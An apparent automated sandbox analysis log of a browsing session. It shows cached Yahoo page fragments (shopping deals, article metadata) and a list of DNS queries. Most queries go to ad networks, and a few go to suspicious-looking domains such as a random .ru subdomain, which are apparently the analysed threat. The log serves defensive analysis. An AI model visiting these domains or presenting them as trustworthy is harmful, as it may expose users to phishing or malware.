<a href=\"https://www.twz.com/29975/new-photos-point-to-chinese-bomber-being-able-to-carry-huge-anti-ship-ballistic-missiles\" rel=\"nofollow noopener\" target=\"_blank\" data-ylk=\"slk:anti-ship ballistic missiles;elm:context_link;itc:0;sec:content-canvas\" class=\"link rapid-noclick-resp\">anti-ship ballistic missiles</a>, <a href=\"https://www.twz.com/9974/whats-the-deal-with-chinas-surface-skimming-anti-ship-drone-missile-hybrid\" rel=\"nofollow noopener\" target=\"_blank\" data-ylk=\"slk:long-range;elm:context_link;itc:0;sec:content-canvas\" class=\"link rapid-noclick-resp\">long-range</a> anti-ship <a href=\"https://www.twz.com/29857/china-appears-set-to-unveil-a-very-high-speed-drone-during-big-beijing-military-parade\" rel=\"nofollow noopener\" target=\"_blank\" data-ylk=\"slk:cruise missiles;elm:context_link;itc:0;sec:content-canvas\" class=\"link rapid-noclick-resp\">cruise missiles</a>, as well as crewed strike aircraft, would be particularly relevant for the PLAN.</p><figure class=caas-figure><div class=caas-figure-with-pb style=\"max-height: 451px\"><div><div class=\"caas-img-container caas-img-lightbox caas-img-loader\" style=padding-bottom:47% data-lightbox-src=https://s.yimg.com/ny/api/res/1.2/aeBVzElZOmuiUqqoXKjjCw--/YXBwaWQ9aGlnaGxhbmRlcjt3PTI0MDA7aD0xMTI4/https://media.zenfs.com/en/the_warzone_735/dbc6a5175c574684285559ca74cc774d><span class=caas-img-wrapper><img class=\"caas-img caas-lazy has-preview\" alt=\"A GJ-11 Sharp Sword on parade on October 1, 2019. <em>The Yomiuri Shimbun via AP</em>\" data-src=https://s.yimg.com/ny/api/res/1.2/kbNEFjBBGfQniKkK_iZFnA--/YXBwaWQ9aGlnaGxhbmRlcjt3PTk2MDtoPTQ1MQ--/https://media.zenfs.com/en/the_warzone_735/dbc6a5175c574684285559ca74cc774d><noscript><img alt=\"A GJ-11 Sharp Sword on parade on October 1, 2019. <em>The Yomiuri Shimbun via AP</em>\" src=https://s.yimg.com/ny/api/res/1.2/kb
Source: chromecache_862.2.dr, chromecache_901.2.drString found in binary or memory: s easy to <a data-i13n=\"elm:affiliate_link;sellerN:Walmart;elmt:;cpos:12;pos:1\" href=\"https://shopping.yahoo.com/rdlw?merchantId=3719d8d4-5edd-4817-998a-91f3229e7323&amp;siteId=us-lifestyle&amp;pageId=1p-autolink&amp;featureId=text-link&amp;merchantName=Walmart&amp;custData=eyJzb3VyY2VOYW1lIjoiV2ViLURlc2t0b3AtVmVyaXpvbiIsImxhbmRpbmdVcmwiOiJodHRwczovL3d3dy53YWxtYXJ0LmNvbS9wbHVzPyIsImNvbnRlbnRVdWlkIjoiMDQ2OGFiZjktYWM5ZC00NzBiLWExN2EtMGFiYmYyN2ViMDA3Iiwib3JpZ2luYWxVcmwiOiJodHRwczovL3d3dy53YWxtYXJ0LmNvbS9wbHVzPyJ9&amp;signature=AQAAAVhT2lza6phzOGg-5KOKU-GtTjebmR4epdM6LCHmvV6U&amp;gcReferrer=https%3A%2F%2Fwww.walmart.com%2Fplus%3F\" class=\"link rapid-noclick-resp rapid-with-clickid etailiffa-link\" rel=\"nofollow noopener\" target=\"_blank\" data-ylk=\"slk:sign up for your free 30-day trial here;elm:affiliate_link;sellerN:Walmart;elmt:;cpos:12;pos:1;itc:0;sec:content-canvas\">sign up for your free 30-day trial here</a>. You equals www.yahoo.com (Yahoo)
Source: chromecache_1163.2.drString found in binary or memory: s</h3><div class=caas-iframe-wrapper data-embed-anchor=dac19782-0aa6-5df1-bb99-7ff420752ab8><div class=\"caas-iframe youtube\" style=padding-bottom:56% data-type=youtube><blockquote data-src=https://www.youtube.com/embed/-hGxbIZxZxk?si=4E-8yLEVIYiLwWzz allowfullscreen><div class=caas-card-loader></div><noscript><iframe src=https://www.youtube.com/embed/-hGxbIZxZxk?si=4E-8yLEVIYiLwWzz allowfullscreen></iframe></noscript></blockquote></div></div><h3 class=caas-jump-link-heading id=key-west-harbor>Key West Harbor</h3><div class=caas-iframe-wrapper data-embed-anchor=11d01d67-d10f-5cf1-9b54-d755efdca34b><div class=\"caas-iframe youtube\" style=padding-bottom:56% data-type=youtube><blockquote data-src=https://www.youtube.com/embed/KFehgVbScgc?si=D4ImH35_qOcYoBKh allowfullscreen><div class=caas-card-loader></div><noscript><iframe src=https://www.youtube.com/embed/KFehgVbScgc?si=D4ImH35_qOcYoBKh allowfullscreen></iframe></noscript></blockquote></div></div><h3 class=caas-jump-link-heading id=cruise-port-key-west>Cruise Port Key West</h3><div class=caas-iframe-wrapper data-embed-anchor=34d16670-8819-5db1-9a24-af362f207287><div class=\"caas-iframe youtube\" style=padding-bottom:56% data-type=youtube><blockquote data-src=https://www.youtube.com/embed/WAu8MKaXyG0?si=2W-68vtUb3YIh6JS allowfullscreen><div class=caas-card-loader></div><noscript><iframe src=https://www.youtube.com/embed/WAu8MKaXyG0?si=2W-68vtUb3YIh6JS allowfullscreen></iframe></noscript></blockquote></div></div><h3 class=caas-jump-link-heading id=southernmost-point>Southernmost Point</h3><div class=caas-iframe-wrapper data-embed-anchor=a325d29c-93d2-5449-8c79-cf3002954ff0><div class=\"caas-iframe youtube\" style=padding-bottom:56% data-type=youtube><blockquote data-src=https://www.youtube.com/embed/uc_hvuO2DRg?si=QT-B9tgYu_xSBFFq allowfullscreen><div class=caas-card-loader></div><noscript><iframe src=https://www.youtube.com/embed/uc_hvuO2DRg?si=QT-B9tgYu_xSBFFq allowfullscreen></iframe></noscript></blockquote></div></div><h3 class=caas-jump-link-heading id=siesta-key>Siesta Key</h3><div class=caas-iframe-wrapper data-embed-anchor=803964ea-5532-5827-bfcf-de503ac424a9><div class=\"caas-iframe youtube\" style=padding-bottom:56% data-type=youtube><blockquote data-src=https://www.youtube.com/embed/-hGxbIZxZxk?si=4E-8yLEVIYiLwWzz allowfullscreen><div class=caas-card-loader></div><noscript><iframe src=https://www.youtube.com/embed/-hGxbIZxZxk?si=4E-8yLEVIYiLwWzz allowfullscreen></iframe></noscript></blockquote></div></div><h3 class=caas-jump-link-heading id=clearwater-beach>Clearwater Beach</h3><div class=caas-iframe-wrapper data-embed-anchor=200985f8-af3c-51e1-9e7e-827408a053e3><div class=\"caas-iframe youtube\" style=padding-bottom:56% data-type=youtube><blockquote data-src=https://www.youtube.com/embed/CWisr5zg3so?si=QK-X-ayV4tKzOeRH allowfullscreen><div class=caas-card-loader></div><noscript><iframe src=https://www.youtube.com/embed/CWisr5zg3so?si=QK-X-ayV4tKzOeRH allowfullscreen></iframe></noscript
Source: chromecache_901.2.drString found in binary or memory: t necessarily break the bank but do the job well and this was it!\"</p> </div><div class=discount-info></div><a class=\"link rapid-noclick-resp cta-btn rapid-with-clickid etailiffa_link\" href=https://shopping.yahoo.com/rdlw?merchantId=66ea567a-c987-4c2e-a2ff-02904efde6ea&siteId=us-lifestyle&pageId=pnr-product-module&featureId=manual-entry&merchantName=Amazon&custData=eyJzb3VyY2VOYW1lIjoiV2ViLURlc2t0b3AtVmVyaXpvbiIsImxhbmRpbmdVcmwiOiJodHRwczovL3d3dy5hbWF6b24uY29tL0Jpc3NlbGwtTXVsdGktUHVycG9zZS1Qb3J0YWJsZS1VcGhvbHN0ZXJ5LTE0MDBCL2RwL0IwMDE2SEY1R0svP3RhZz15bGUwMS0yMCIsImNvbnRlbnRVdWlkIjoiMTJkZmJhOTktMDBjZi00ZjAxLWFjNzgtMDZkNmMwZDA3NTI0Iiwib3JpZ2luYWxVcmwiOiJodHRwczovL3d3dy5hbWF6b24uY29tL0Jpc3NlbGwtTXVsdGktUHVycG9zZS1Qb3J0YWJsZS1VcGhvbHN0ZXJ5LTE0MDBCL2RwL0IwMDE2SEY1R0svIiwiZHluYW1pY0NlbnRyYWxUcmFja2luZ0lkIjp0cnVlLCJzaXRlSWQiOiJ1cy1saWZlc3R5bGUiLCJwYWdlSWQiOiJwbnItcHJvZHVjdC1tb2R1bGUiLCJmZWF0dXJlSWQiOiJtYW51YWwtZW50cnkifQ&signature=AQAAAUGLAPd5jaOEqExfBW7pD9C8BAgUE2sR0kNOyV8b99xe&gcReferrer=https%3A%2F%2Fwww.amazon.com%2FBissell-Multi-Purpose-Portable-Upholstery-1400B%2Fdp%2FB0016HF5GK%2F&itemName=Bissell+Little+Green+Multi-Purpose+Cleaner&contentUuid=12dfba99-00cf-4f01-ac78-06d6c0d07524 rel=\"noopener noreferrer nofollow\" target=_blank data-ylk=\"sec:small-product;subsec:commlist;cpos:14;elmt:chooseForMe;pdid:Bissell Little Green Multi-Purpose Cleaner;pid:manual_12dfba99-00cf-4f01-ac78-06d6c0d07524_1728065541824;aid:manual_12dfba99-00cf-4f01-ac78-06d6c0d07524_1728065541824;itemcost:$124;itmId:$82;sellerN:Amazon;ll3:product-available;ll4:productoffer-manual;elm:affiliate_link;itc:0;slk:$82 at Amazon;pkgt:horizontal-cta-1;pos:5\">$82 at Amazon</a></div></div><p>If you have <a data-i13n=\"cpos:6;pos:1;elm:affiliate_link;elmt:premonetized\" href=\"https://shopping.yahoo.com/rdlw?merchantId=66ea567a-c987-4c2e-a2ff-02904efde6ea&amp;siteId=us-lifestyle&amp;pageId=1p-autolink&amp;featureId=text-link&amp;merchantName=Amazon&amp;custData=eyJzb3VyY2VOYW1lIjoiV2ViLURlc2t0b3AtVmVyaXpvbiIsImxhbmRpbmdVcmwiOiJodHRwczovL3d3dy5hbWF6b24uY29tL2FtYXpvbnByaW1lP3RhZz15bGUwMS1wLXYtMWhmLTIwIiwiY29udGVudFV1aWQiOiJiNTk5ZTVjZC1iNjc2LTQwN2YtYTZiZS1mOGVmYTI2YjM1ZjMifQ&amp;signature=AQAAAb9xQDyptjKSiYOwE3-ycXLr7-GyoPa6V5VDf9TrgThj&amp;gcReferrer=https%3A%2F%2Fwww.amazon.com%2Famazonprime&amp;uuid=1SnvbFAD2EyXFhuv13047\" rel=\"nofollow noopener\" target=\"_blank\" data-ylk=\"slk:Amazon Prime;cpos:6;pos:1;elm:affiliate_link;elmt:premonetized;itc:0;sec:content-canvas\" class=\"link rapid-noclick-resp rapid-with-clickid etailiffa-link\">Amazon Prime</a>, you equals www.yahoo.com (Yahoo)
Source: chromecache_1163.2.drString found in binary or memory: ve seen for one of the most powerful cordless vacuum cleaners around.</p></div></div></div></div></div></li></ul></div><h2 class=caas-jump-link-heading id=your-october-prime-day-shopping-guide><strong>Your October Prime Day Shopping Guide</strong></h2><p>See all of our<a data-i13n=\"cpos:23;pos:1\" href=\"https://www.yahoo.com/topics/prime-day/\" data-ylk=\"slk:Prime Day;cpos:23;pos:1;elm:context_link;itc:0;sec:content-canvas\" class=\"link rapid-noclick-resp\"> Prime Day</a> coverage. Shop the best Prime Day deals on <em>Yahoo Life</em>. Follow <em>Engadget</em> for <a data-i13n=\"cpos:24;pos:1\" href=\"https://www.engadget.com/deals/amazon-october-prime-day-2024-the-best-early-deals-we-found-ahead-of-the-big-deal-days-sale-050506494.html\" data-ylk=\"slk:Prime Day tech deals;cpos:24;pos:1;elm:context_link;itc:0;sec:content-canvas\" class=\"link rapid-noclick-resp\">Prime Day tech deals</a>. And find <a data-i13n=\"cpos:25;pos:1\" href=\"https://www.aol.com/amazon-october-prime-day-2024-everything-to-know-about-the-big-event-including-deals-to-shop-already-004738067.html\" data-ylk=\"slk:Prime Day sales;cpos:25;pos:1;elm:context_link;itc:0;sec:content-canvas\" class=\"link rapid-noclick-resp\">Prime Day sales</a> to shop on AOL, handpicked just for you.</p><h2 class=caas-jump-link-heading id=how-to-get-prime-day-discounts>How to get Prime Day Discounts</h2><p>If you have <a data-i13n=\"elm:affiliate_link;sellerN:Amazon;elmt:;cpos:26;pos:1\" href=\"https://shopping.yahoo.com/rdlw?merchantId=66ea567a-c987-4c2e-a2ff-02904efde6ea&amp;siteId=us-lifestyle&amp;pageId=1p-autolink&amp;featureId=text-link&amp;merchantName=Amazon&amp;custData=eyJzb3VyY2VOYW1lIjoiV2ViLURlc2t0b3AtVmVyaXpvbiIsImxhbmRpbmdVcmwiOiJodHRwczovL3d3dy5hbWF6b24uY29tL2FtYXpvbnByaW1lP3RhZz15bGUwMS0yMCIsImNvbnRlbnRVdWlkIjoiYmQ4N2MyNGEtOGMzNC00ZWMwLWE2ODEtMzU2NGMwMmQ3Nzc4Iiwib3JpZ2luYWxVcmwiOiJodHRwczovL3d3dy5hbWF6b24uY29tL2FtYXpvbnByaW1lIiwiZHluYW1pY0NlbnRyYWxUcmFja2luZ0lkIjp0cnVlLCJzaXRlSWQiOiJ1cy1saWZlc3R5bGUiLCJwYWdlSWQiOiIxcC1hdXRvbGluayIsImZlYXR1cmVJZCI6InRleHQtbGluayJ9&amp;signature=AQAAAQSd9qukwHWem0D-5166vvE9iGPfdzEMH0UvBrmLz5vu&amp;gcReferrer=https%3A%2F%2Fwww.amazon.com%2Famazonprime\" class=\"link rapid-noclick-resp rapid-with-clickid etailiffa-link\" rel=\"nofollow noopener\" target=\"_blank\" data-ylk=\"slk:Amazon Prime;elm:affiliate_link;sellerN:Amazon;elmt:;cpos:26;pos:1;itc:0;sec:content-canvas\">Amazon Prime</a>, you equals www.yahoo.com (Yahoo)
Source: chromecache_862.2.drString found in binary or memory: {"items":[{"data":{"partnerData":{"adMeta":{"hashtag":"amazon;news;prime-day;shopping;shopping;hobbies","isSupplySegment":"false","lang":"en-US","region":"US","rs":"lmsid:a0V0W00000JIbmMUAT;revsp:yahoo_life_shopping_281;lpstaid:12dfba99-00cf-4f01-ac78-06d6c0d07524;pt:content;pd:modal;ver:megastrm;pct:story","site_attribute":"wiki_topics=\"Amazon_Prime\" ctopid=\"1878000;10610489;1720500\" hashtag=\"amazon;news;prime-day;shopping;1878000;10610489;1720500\" rs=\"lmsid:a0V0W00000JIbmMUAT;revsp:yahoo_life_shopping_281;lpstaid:12dfba99-00cf-4f01-ac78-06d6c0d07524;pt:content;pd:modal;ver:megastrm;lu:0;pct:story\"","spaceid":"1197792446","site":"lifestyle","enabled":true,"pos":"","showBodyAds":false,"showPhotoAds":false},"alias":"ymedia-alias:shadow=record-lows-on-apple-and-dyson-plus-12-more-prime-day-deals-worth-the-splurge-160520320","canonicalSite":"lifestyle","canonicalUrl":"https://www.yahoo.com/lifestyle/record-lows-on-apple-and-dyson-plus-12-more-prime-day-deals-worth-the-splurge-160520320.html","categoryLabel":"Lifestyle","commentsAllowed":true,"commentsCount":0,"commerceArticleType":"dealsRoundup","contentMeta":{"adPostions":{"photos":{}},"bodySlots":{"commerceQuickOverviewSlot":{"id":"caas-commerce-quick-overview","insertIndex":1}},"cover":null,"embeds":null,"hasEmbedAtBeginning":false,"hasEmbedAtEnd":false,"hasYahooVideo":false,"isLongArticle":false,"potentialSlots":0,"outstreamAdPosition":-1,"readMorePosition":-1,"totalParagraphs":0,"contentI13n":{}},"contentType":"story","editorialPicksList":"6200f7cd-485c-44a6-9643-0097fb5f80c9","entities":[{"term":"WIKIID:Amazon_Prime","label":"Prime Day","capAbtScore":"0.951","metaData":[{"visible":"false"}],"startchar":170,"endchar":178,"specialParentTags":["a","strong","title"],"instanceParentTags":["a"]},{"term":"YCT:001000560","score":"0.603053","label":"Hobbies & Personal Activities"},{"term":"YCT:001000616","score":"0.491228","label":"Shopping"},{"term":"YMEDIA:CATEGORY=100000002","score":"1.0","label":""},{"term":"YMEDIA:CATEGORY=100000009","score":"1.0","label":""}],"factualPollId":null,"finalUrl":"https://www.yahoo.com/lifestyle/record-lows-on-apple-and-dyson-plus-12-more-prime-day-deals-worth-the-splurge-160520320.html","hasScribble":false,"hasSlickVideo":false,"hasXraySideRail":false,"heroModule":{},"hideAllAds":false,"hostedType":"hosted","hrefLangs":[],"isAffilimateTest":false,"isBrandedContent":false,"isCommentsEligible":false,"isCreatorContent":false,"isImmersiveContent":false,"isOriginalContent":true,"isPersonalFinanceArticle":false,"isEditorialPicksListOverridden":false,"isSponsoredContent":false,"keywords":"Prime Day","meta":{},"modifiedDate":"Tue, 08 Oct 2024 18:50:33 GMT","pageTitle":"Prime Day deals worth the splurge: Record lows on Apple and Dyson, plus 12 more big-ticket must buys","preload":[{"href":"https://s.yimg.com/ny/api/res/1.2/TZqh_m0wWwHhQsn5p4sqNA--/YXBwaWQ9aGlnaGxhbmRlcjt3PTEyNDI7aD04Mjg7Y2Y9d2VicA--/https://s.yimg.com/os/creatr-uploaded-images/2024-10/0368e4b0-81be-11e
Source: chromecache_901.2.drString found in binary or memory: {"items":[{"data":{"partnerData":{"adMeta":{"hashtag":"amazon;news;prime-day;shopping;shopping;hobbies","isSupplySegment":"false","lang":"en-US","region":"US","rs":"lmsid:a0V0W00000JIbmMUAT;revsp:yahoo_life_shopping_281;lpstaid:12dfba99-00cf-4f01-ac78-06d6c0d07524;pt:content;pd:modal;ver:megastrm;pct:story","site_attribute":"wiki_topics=\"Amazon_Prime\" ctopid=\"1878000;10610489;1720500\" hashtag=\"amazon;news;prime-day;shopping;1878000;10610489;1720500\" rs=\"lmsid:a0V0W00000JIbmMUAT;revsp:yahoo_life_shopping_281;lpstaid:12dfba99-00cf-4f01-ac78-06d6c0d07524;pt:content;pd:modal;ver:megastrm;lu:0;pct:story\"","spaceid":"1197792446","site":"lifestyle","enabled":true,"pos":"","showBodyAds":false,"showPhotoAds":false},"alias":"ymedia-alias:shadow=record-lows-on-apple-and-dyson-plus-12-more-prime-day-deals-worth-the-splurge-160520320","canonicalSite":"lifestyle","canonicalUrl":"https://www.yahoo.com/lifestyle/record-lows-on-apple-and-dyson-plus-12-more-prime-day-deals-worth-the-splurge-160520320.html","categoryLabel":"Lifestyle","commentsAllowed":true,"commentsCount":0,"commerceArticleType":"dealsRoundup","contentMeta":{"adPostions":{"photos":{}},"bodySlots":{"commerceQuickOverviewSlot":{"id":"caas-commerce-quick-overview","insertIndex":1}},"cover":null,"embeds":null,"hasEmbedAtBeginning":false,"hasEmbedAtEnd":false,"hasYahooVideo":false,"isLongArticle":false,"potentialSlots":0,"outstreamAdPosition":-1,"readMorePosition":-1,"totalParagraphs":0,"contentI13n":{}},"contentType":"story","editorialPicksList":"6200f7cd-485c-44a6-9643-0097fb5f80c9","entities":[{"term":"WIKIID:Amazon_Prime","label":"Prime Day","capAbtScore":"0.951","metaData":[{"visible":"false"}],"startchar":170,"endchar":178,"specialParentTags":["a","strong","title"],"instanceParentTags":["a"]},{"term":"YCT:001000560","score":"0.603053","label":"Hobbies & Personal Activities"},{"term":"YCT:001000616","score":"0.491228","label":"Shopping"},{"term":"YMEDIA:CATEGORY=100000002","score":"1.0","label":""},{"term":"YMEDIA:CATEGORY=100000009","score":"1.0","label":""}],"factualPollId":null,"finalUrl":"https://www.yahoo.com/lifestyle/record-lows-on-apple-and-dyson-plus-12-more-prime-day-deals-worth-the-splurge-160520320.html","hasScribble":false,"hasSlickVideo":false,"hasXraySideRail":false,"heroModule":{},"hideAllAds":false,"hostedType":"hosted","hrefLangs":[],"isAffilimateTest":false,"isBrandedContent":false,"isCommentsEligible":false,"isCreatorContent":false,"isImmersiveContent":false,"isOriginalContent":true,"isPersonalFinanceArticle":false,"isEditorialPicksListOverridden":false,"isSponsoredContent":false,"keywords":"Prime Day","meta":{},"modifiedDate":"Tue, 08 Oct 2024 18:50:33 GMT","pageTitle":"Prime Day deals worth the splurge: Record lows on Apple and Dyson, plus 12 more big-ticket must buys","preload":[{"href":"https://s.yimg.com/ny/api/res/1.2/a1IR1jojvzevokkwtheARg--/YXBwaWQ9aGlnaGxhbmRlcjt3PTEyNDI7aD04Mjg-/https://s.yimg.com/os/creatr-uploaded-images/2024-10/0368e4b0-81be-11ef-9f53-7a1ad
Source: chromecache_1144.2.dr, chromecache_876.2.drString found in binary or memory: {"items":[{"data":{"partnerData":{"adMeta":{"hashtag":"news;entertainment","isSupplySegment":"false","lang":"en-US","region":"US","rs":"lmsid:a0a6T00000MOZxjQAH;revsp:billboard_547;lpstaid:53c53b29-181a-3610-abb6-7342d7ac1416;pt:content;pd:modal;ver:megastrm;pct:story","site_attribute":"wiki_topics=\"Plastic_surgery;Cardi_B;Hourglass_figure\" ctopid=\"1035500\" hashtag=\"news;1035500\" rs=\"lmsid:a0a6T00000MOZxjQAH;revsp:billboard_547;lpstaid:53c53b29-181a-3610-abb6-7342d7ac1416;pt:content;pd:modal;ver:megastrm;lu:0;pct:story\"","spaceid":"1197792446","site":"entertainment","enabled":true,"pos":"","showBodyAds":false,"showPhotoAds":false},"alias":"ymedia-alias:shadow=cardi-b-shows-off-her-170246496","canonicalSite":"entertainment","canonicalUrl":"https://www.billboard.com/music/music-news/cardi-b-slams-plastic-surgery-rumors-photo-video-1235794470/","categoryLabel":"Celebrity","commentsAllowed":true,"commentsCount":0,"contentMeta":{"adPostions":{"photos":{},"INARTICLE":5},"bodySlots":{},"cover":null,"embeds":null,"hasEmbedAtBeginning":false,"hasEmbedAtEnd":false,"hasYahooVideo":false,"isLongArticle":false,"potentialSlots":0,"outstreamAdPosition":-1,"readMorePosition":-1,"totalParagraphs":0,"contentI13n":{}},"contentType":"story","editorialPicksList":"00ded72e-a9ea-4100-916d-706256181539","entities":[{"term":"WIKIID:Plastic_surgery","label":"plastic surgery","capAbtScore":"0.898","metaData":[{"visible":"false"}],"startchar":531,"endchar":545,"specialParentTags":["title"],"instanceParentTags":[]},{"term":"","label":"Billboard","capAbtScore":"0.854","metaData":[{"visible":"false"}],"startchar":782,"endchar":790,"specialParentTags":["a","strong"],"instanceParentTags":["strong"]},{"term":"","label":"video cause","capAbtScore":"0.847","metaData":[{"visible":"false"}],"startchar":1518,"endchar":1528,"specialParentTags":[],"instanceParentTags":[]},{"term":"WIKIID:Cardi_B","label":"Cardi B","capAbtScore":"0.846","metaData":[{"visible":"false"}],"startchar":344,"endchar":350,"specialParentTags":["a","title"],"instanceParentTags":["a"]},{"term":"YCT:001000031","score":"0.769231","label":"Arts & Entertainment"},{"term":"YMEDIA:CATEGORY=100000005","score":"1.0","label":""},{"term":"YMEDIA:CATEGORY=100000002","score":"1.0","label":""},{"term":"YMEDIA:CATEGORY=100000008","score":"1.0","label":""}],"factualPollId":null,"finalUrl":"https://www.yahoo.com/entertainment/cardi-b-shows-off-her-170246496.html","hasScribble":false,"hasSlickVideo":false,"hasXraySideRail":false,"heroModule":{},"hideAllAds":false,"hostedType":"hosted","hrefLangs":[],"isAffilimateTest":false,"isBrandedContent":false,"isCommentsEligible":false,"isCreatorContent":false,"isImmersiveContent":false,"isOriginalContent":false,"isPersonalFinanceArticle":false,"isEditorialPicksListOverridden":false,"isSponsoredContent":false,"keywords":"plastic surgery, Billboard, video cause, Cardi B","meta":{},"modifiedDate":"Mon, 07 Oct 2024 17:02:46 GMT","pageTitle":"Cardi B Shows Off What Her Body equals www.y
Source: global trafficDNS traffic detected: DNS query: mollysirishpub-tol.com
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: ortkn.lovationyme.com
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: dwpiafciythvn44tps36lv9l4fgyrnovcbgad9jvcyrwlvtdwrd2.tropeyleg.ru
Source: global trafficDNS traffic detected: DNS query: yahoo.com
Source: global trafficDNS traffic detected: DNS query: www.yahoo.com
Source: global trafficDNS traffic detected: DNS query: geo.yahoo.com
Source: global trafficDNS traffic detected: DNS query: s.yimg.com
Source: global trafficDNS traffic detected: DNS query: geo.query.yahoo.com
Source: global trafficDNS traffic detected: DNS query: search.yahoo.com
Source: global trafficDNS traffic detected: DNS query: consent.cmp.oath.com
Source: global trafficDNS traffic detected: DNS query: edge-mcdn.secure.yahoo.com
Source: global trafficDNS traffic detected: DNS query: udc.yahoo.com
Source: global trafficDNS traffic detected: DNS query: securepubads.g.doubleclick.net
Source: global trafficDNS traffic detected: DNS query: cdn.taboola.com
Source: global trafficDNS traffic detected: DNS query: opus.analytics.yahoo.com
Source: global trafficDNS traffic detected: DNS query: noa.yahoo.com
Source: global trafficDNS traffic detected: DNS query: trc.taboola.com
Source: global trafficDNS traffic detected: DNS query: beacon.taboola.com
Source: global trafficDNS traffic detected: DNS query: pm-widget.taboola.com
Source: global trafficDNS traffic detected: DNS query: pips.taboola.com
Source: global trafficDNS traffic detected: DNS query: images.taboola.com
Source: global trafficDNS traffic detected: DNS query: v-akfx1y454r.wc.yahoodns.net
Source: global trafficDNS traffic detected: DNS query: v-bwllghkff5.wc.yahoodns.net
Source: global trafficDNS traffic detected: DNS query: cds.taboola.com
Source: global trafficDNS traffic detected: DNS query: v-ca9s256c5j.wc.yahoodns.net
Source: global trafficDNS traffic detected: DNS query: dns-aup3nb5p0.sombrero.yahoo.net
Source: global trafficDNS traffic detected: DNS query: cerebro.edna.yahoo.net
Source: global trafficDNS traffic detected: DNS query: rwf9bb5hj.wc.06yahoo.com
Source: global trafficDNS traffic detected: DNS query: ral248z7j.wc.06yahoo.com
Source: global trafficDNS traffic detected: DNS query: wnsrvbjmeprtfrnfx.ay.delivery
Source: global trafficDNS traffic detected: DNS query: ybar-bwllghkff5report.wc.yahoodns.net
Source: global trafficDNS traffic detected: DNS query: ybar-akfx1y454rreport.wc.yahoodns.net
Source: global trafficDNS traffic detected: DNS query: cerebro-dns-report.wc.yahoodns.net
Source: global trafficDNS traffic detected: DNS query: ybar-ca9s256c5jreport.wc.yahoodns.net
Source: global trafficDNS traffic detected: DNS query: ybar-mcdn-report.wc.yahoodns.net
Source: global trafficDNS traffic detected: DNS query: ch-trc-events.taboola.com
Source: global trafficDNS traffic detected: DNS query: finance.yahoo.com
Source: global trafficDNS traffic detected: DNS query: vidanalytics.taboola.com
Source: global trafficDNS traffic detected: DNS query: cdn.jsdelivr.net
Source: global trafficDNS traffic detected: DNS query: query1.finance.yahoo.com
Source: global trafficDNS traffic detected: DNS query: query2.finance.yahoo.com
Source: global trafficDNS traffic detected: DNS query: s2.coinmarketcap.com
Source: global trafficDNS traffic detected: DNS query: pbs.yahoo.com
Source: global trafficDNS traffic detected: DNS query: idx.liadm.com
Source: global trafficDNS traffic detected: DNS query: ads.yieldmo.com
Source: global trafficDNS traffic detected: DNS query: hbopenbid.pubmatic.com
Source: global trafficDNS traffic detected: DNS query: fastlane.rubiconproject.com
Source: global trafficDNS traffic detected: DNS query: tlx.3lift.com
Source: global trafficDNS traffic detected: DNS query: bidder.criteo.com
Source: global trafficDNS traffic detected: DNS query: rtb.openx.net
Source: global trafficDNS traffic detected: DNS query: prebid.media.net
Source: global trafficDNS traffic detected: DNS query: display.bidder.taboola.com
Source: global trafficDNS traffic detected: DNS query: c2shb-oao.ssp.yahoo.com
Source: global trafficDNS traffic detected: DNS query: htlb.casalemedia.com
Source: global trafficDNS traffic detected: DNS query: rp.liadm.com
Source: global trafficDNS traffic detected: DNS query: match.adsrvr.org
Source: global trafficDNS traffic detected: DNS query: static.criteo.net
Source: global trafficDNS traffic detected: DNS query: prebid.a-mo.net
Source: global trafficDNS traffic detected: DNS query: eb2.3lift.com
Source: global trafficDNS traffic detected: DNS query: assets.a-mo.net
Source: global trafficDNS traffic detected: DNS query: cm.g.doubleclick.net
Source: global trafficDNS traffic detected: DNS query: guce.yahoo.com
Source: global trafficDNS traffic detected: DNS query: ads.pubmatic.com
Source: global trafficDNS traffic detected: DNS query: eus.rubiconproject.com
Source: global trafficDNS traffic detected: DNS query: yahoo-bidout-d.openx.net
Source: global trafficDNS traffic detected: DNS query: contextual.media.net
Source: global trafficDNS traffic detected: DNS query: x.bidswitch.net
Source: global trafficDNS traffic detected: DNS query: pixel.rubiconproject.com
Source: global trafficDNS traffic detected: DNS query: js-sec.indexww.com
Source: global trafficDNS traffic detected: DNS query: px.ads.linkedin.com
Source: global trafficDNS traffic detected: DNS query: pr-bh.ybp.yahoo.com
Source: global trafficDNS traffic detected: DNS query: sync.srv.stackadapt.com
Source: global trafficDNS traffic detected: DNS query: id.a-mx.com
Source: global trafficDNS traffic detected: DNS query: cm.adform.net
Source: global trafficDNS traffic detected: DNS query: image8.pubmatic.com
Source: global trafficDNS traffic detected: DNS query: ssum.casalemedia.com
Source: global trafficDNS traffic detected: DNS query: ap.lijit.com
Source: global trafficDNS traffic detected: DNS query: ssp-sync.criteo.com
Source: global trafficDNS traffic detected: DNS query: ib.adnxs.com
Source: global trafficDNS traffic detected: DNS query: pixel-eu.rubiconproject.com
Source: global trafficDNS traffic detected: DNS query: sync.ipredictive.com
Source: global trafficDNS traffic detected: DNS query: dis.criteo.com
Source: global trafficDNS traffic detected: DNS query: hbx.media.net
Source: global trafficDNS traffic detected: DNS query: gum.criteo.com
Source: global trafficDNS traffic detected: DNS query: secure-assets.rubiconproject.com
Source: global trafficDNS traffic detected: DNS query: p.rfihub.com
Source: global trafficDNS traffic detected: DNS query: tsdtocl.com
Source: global trafficDNS traffic detected: DNS query: sync-tm.everesttech.net
Source: global trafficDNS traffic detected: DNS query: widget.us.criteo.com
Source: global trafficDNS traffic detected: DNS query: sync.a-mo.net
Source: global trafficDNS traffic detected: DNS query: s.amazon-adsystem.com
Source: global trafficDNS traffic detected: DNS query: token.rubiconproject.com
Source: global trafficDNS traffic detected: DNS query: sync.1rx.io
Source: global trafficDNS traffic detected: DNS query: pixel.tapad.com
Source: global trafficDNS traffic detected: DNS query: match.prod.bidr.io
